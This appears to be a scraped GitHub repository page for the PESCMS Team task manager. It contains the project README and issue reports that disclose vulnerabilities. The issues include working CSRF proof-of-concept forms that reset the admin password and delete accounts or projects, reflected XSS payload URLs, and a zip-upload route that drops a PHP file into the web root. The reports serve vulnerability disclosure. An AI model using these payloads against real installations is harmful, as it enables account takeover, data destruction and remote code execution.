lazyphp / pescms-team Goto Github PK

The open source task management system

License: GNU General Public License v2.0

PHP 19.28% CSS 19.80% JavaScript 58.29% HTML 2.19% Hack 0.05% Less 0.39%

pescms-team's Introduction

PESCMS Team 团队任务管理系统

PESCMS TEAM是一款以GPLv2协议进行开源的团队任务管理系统
The open source task management system
PESCMS官方QQ 1群：451828934
PESCMS官方QQ 2群：496804032
演示地址:http://team.pescms.com

环境要求

PHP 7.0或以上且需要安装PDO扩展、GD库
MYSQL 5.5或以上

PESCMS TEAM特色

1.兼容PC端和移动端，实测PC端支持：IE8+、Chrome、Firefox、Safari…… 移动端支持安卓和苹果系统。
2.强大而简单得任务分配指派功能，让任务管理变得更加简单和实用。
3.丰富的操作和开发文档，让二次开发变得更加简单和友好！

安装使用

下载并解压程序至您的HTTP运行环境所在目录。

没有配置虚拟主机，则访问Public目录。反之，请将虚拟主机目录配置到Public

根据安装程序填写对应数据，完成软件安装。

反馈和建议

邮箱：sale#pescms.com
官方网站:https://www.pescms.com/
演示地址:https://team.pescms.com
开发文档：https://document.pescms.com/article/5.html
操作文档：https://document.pescms.com/article/2.html

pescms-team's People

Contributors

Stargazers

Watchers

pescms-team's Issues

导出报表到表格存在问题

无法导出，

There are some vulnerabilities in cms.

Cross Site Request Forgery(CSRF)-1

modify admin's password ,mail,phone and head-image.

Technical Description:
file :
pescms/App/Team/PUT/User.php

The function of this file is to Modify personal information,but it don't Verify whether the operation is legal.
Through it attackers can modify admin's password ,mail,phone and head-image.

Proof of Concept(PoC)

  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/pescms/Public/?g=Team&m=User&a=setting" method="POST">
      <input type="hidden" name="method" value="PUT" />
      <input type="hidden" name="name" value="admin" />
      <input type="hidden" name="mail" value="123456&#64;qq&#46;com" />
      <input type="hidden" name="phone" value="" />
      <input type="hidden" name="password" value="newadmin" />
      <input type="hidden" name="home" value="Team&#45;Index&#45;index" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Success.And the password of admin has been modify.

Cross Site Request Forgery(CSRF)-2

Delete the administrator and other member's account number

Technical Description:
file:

pescms/App/Team/DELETE/Content.php
pescms/App/Team/DELETE/Field.php

Throught it can delete Any member and administrator just by modify the 'id' that in Url.
Delete the Account number of administrator just need to modify the id as '1'.

Proof of Concept(PoC)

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/pescms/Public/?g=Team&m=User&a=action&id=36&method=DELETE&back_url=L3Blc2Ntcy9QdWJsaWMvP2c9VGVhbSZtPVVzZXImYT1pbmRleA==" method="POST">
      <input type="hidden" name="" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Visit this page of poc:

We refresh the list of user ,that find that the user that called light is deleted.

Cross Site Request Forgery(CSRF)-3

Delete import information

Technical Description:
file:

pescms/App/Team/DELETE/Attachment.php
pescms/App/Team/DELETE/Content.php
pescms/App/Team/DELETE/Field.php
pescms/App/Team/DELETE/Model.php
pescms/App/Team/DELETE/Notice.php

Through CSRF to Delete important data is exist in these files.

ALL the delete operations are not verify in front page. Like this:

Proof of Concept(PoC)

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/pescms/Public/?g=Team&m=Project&a=action&id=1&method=DELETE&back_url=L3Blc2Ntcy9QdWJsaWMvP2c9VGVhbSZtPVByb2plY3QmYT1pbmRleA==" method="POST">
      <input type="hidden" name="" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

refresh:

And other operations of delete are exist on this cms. Just give the positions,don't prove.

Reflected XSS in App/Team/GET/Repoort.php

In the method of extract, the CSRF also exist , but this is to prove the Rdflected XSS,not CSRF.

In line 72-78 , the data from $_GET('begin') and $_GET('end') is transfer to variables, and output in pages.

Proof of Concept(PoC)

localhost/pescms/Public/?g=Team&m=Report&a=extract&begin="onmouseover=alert(1)//&end=&user=0
or 
localhost/pescms/Public/?g=Team&m=Report&a=extract&begin=&end="onmouseover=alert(1)//&user=0
or,page:
http://localhost/pescms/Public/?g=Team&m=Report&a=allExtract&begin="onmouseover=alert(1)//&end=&user=0

In this page ,Reflected XSS can be combined with CSRF,this will cause bigger destruction

PECSM-TEAM 2.2.2 has a file upload vulnerability in /Public/?g=Team&m=Setting&a=upgrade

This page let user upgrade the PESCMS system manually.

Follow the mtUpgrade funtction,the upload file extension must be “zip”

and follow the unzip function

Follow the simulateInstall function and install function,we can see the file decompression in root directory

so,we can create a evil.php

and compression it as evil.zip,and upload the evil.zip,

at last ,the system decompress evil.zip and evil.php in root directory.

I found multiple reflected cross site scripting vulnerability where the page use Model_index.php ,we can see where is no XSS filter in "keyword" parameter.

now I input payload :aa">< img src=x onerror=alert(1)>
the full url is :http://127.0.0.1/Public/?g=Team&m=User&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E